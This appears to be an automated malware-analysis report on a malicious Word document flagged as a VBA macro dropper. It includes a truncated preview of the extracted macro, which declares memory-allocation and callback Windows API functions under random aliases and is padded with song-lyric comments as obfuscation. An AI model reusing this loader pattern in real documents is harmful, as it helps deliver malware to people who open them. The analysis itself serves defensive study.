MALICIOUS
82
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV with the signature Doc.Dropper.Agent-6592057-0, indicating it is a dropper. The presence of VBA macros further supports this, as they are commonly used to download and execute additional malicious content. The macro code itself is heavily obfuscated with comments and uses API calls that suggest it is designed to facilitate the execution of a secondary payload.
Heuristics 3
-
ClamAV: Doc.Dropper.Agent-6592057-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6592057-0
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/camera-raw-settings/1.0/In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://www.iec.chIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7886 bytes |
SHA-256: 68e04ae8fdd2951af98d803ea8eec468bee70eeaac9a91c15688f1199834731e |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "acknowledgment" 'Where is my home and where am I going? 'When will I know and how will I know? #If Win64 Then 'Like a lover turning into a friend 'Where is my home and where am I going? Public Declare PtrSafe Function italy Lib "kernel32" Alias "HeapCreate" (ByVal piroplasm As LongPtr, ByVal breastfed As LongPtr, ByVal obligatorily As LongPtr) As LongPtr 'And I don't know if it ever will mend 'Why do I feel like I'm in a hurry Public Declare PtrSafe Function onesided Lib "kernel32" Alias "RemoveDirectoryA" (dendroaspis As LongPtr) 'Like a lover turning into a friend 'Why do I feel like I'm in a hurry Public Declare PtrSafe Function jaculate Lib "kernel32" Alias "HeapAlloc" (ByVal competing As LongPtr, ByVal surviving As LongPtr, ByVal rudiments As LongPtr) As LongPtr 'How does the whole thing end? 'I want to believe in something I feel Public Declare PtrSafe Function nondisposable Lib "kernel32" Alias "TlsAlloc" () As LongPtr 'And I don't know if it ever will mend 'I had a lover who turned into a friend Public Declare PtrSafe Function biannually Lib "user32" Alias "EndDialog" (ByVal jaded As LongPtr,nResult As LongPtr) As LongPtr 'Like a lover turning into a friend 'I had a lover who turned into a friend Public Declare PtrSafe Function bloodlessly Lib "kernel32" Alias "GetModuleHandle" (lpModuleName As LongPtr) 'When will I know and how will I know? 'Will I always be here spinning my wheels Public Declare PtrSafe Function malted Lib "kernel32" Alias _ "EnumSystemLanguageGroupsA" (ByVal lpEnumFunc As Any, ByVal hModule As Any, lParam As Any) As LongPtr 'I had a lover who turned into a friend 'When will I marry Public Declare PtrSafe Function chemoreceptive Lib "user32" Alias "GetDC" (ByVal archtraitor As LongPtr) As LongPtr 'Or does misfortune have a hand in the deal 'Who will be king and who will be beggar? Public Declare PtrSafe Sub necessary Lib "ntdll" Alias "RtlMoveMemory" (dishevel As Any, perm As Any, ByVal conjugate As LongPtr) 'Why do I cry for nothing sometimes 'I want to believe in a nurturing love 'I want to believe love has a chance to survive 'Why do I cry for nothing sometimes #Else 'Nothing's for sure except growing old 'And I don't know if it ever will mend Public Declare Function malted Lib "kernel32" Alias _ "EnumSystemLanguageGroupsA" (ByVal lpEnumFunc As Any, ByVal katmandu As Any, lParam As Any) As Long 'And I don't know if it ever will mend 'Somewhere a heart is getting broken again Public Declare Function monitive Lib "kernel32" Alias "GetModuleHandle" (lpModuleName As Long) 'And I don't know if it ever will mend 'When will I know and how will I know? Public Declare Function bakelite Lib "user32" Alias "GetDC" (chlorambucil As Long) As Long 'And not just a sacrifice 'Who will be king and who will be beggar? Public Declare Function sledding Lib "kernel32" Alias "RemoveDirectoryA" (defecation As Long) 'I want to believe in something I feel 'Like a lover turning into a friend Public Declare Function beast Lib "user32" Alias "EndDialog" (ByVal ophicleide As Long, killing As Long) As Long 'When will I know and how will I know? 'The dream to be as one Public Declare Sub necessary Lib "ntdll" Alias "RtlMoveMemory" (holder As Any, stemwinder As Any, ByVal anthropophagist As Long) 'When will I know and how will I know? 'When will I marry Public Declare Function italy Lib "kernel32" Alias "HeapCreate" (ByVal unlined As Long, ByVal bedmate As Long, ByVal foulard As Long) As Long 'When will I have this mystery solved? 'Feels like a race and I'm out of time Public Declare Function jaculate Lib "kernel32" Alias "HeapAlloc" (ByVal acreage As Long, ByVal penguin As Long, ByVal housebreaking As Long) As Long 'I want to believe in a nurturing love 'The dream to be as one Public Declare Function earless Lib "kernel32" Alias "TlsAlloc" () As Long 'The dream to be as one 'Nothing's for sure except growing old 'Why do I feel like I'm in a hurry 'The dream to be as one #End If 'I want to believe love has a chance to survive ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.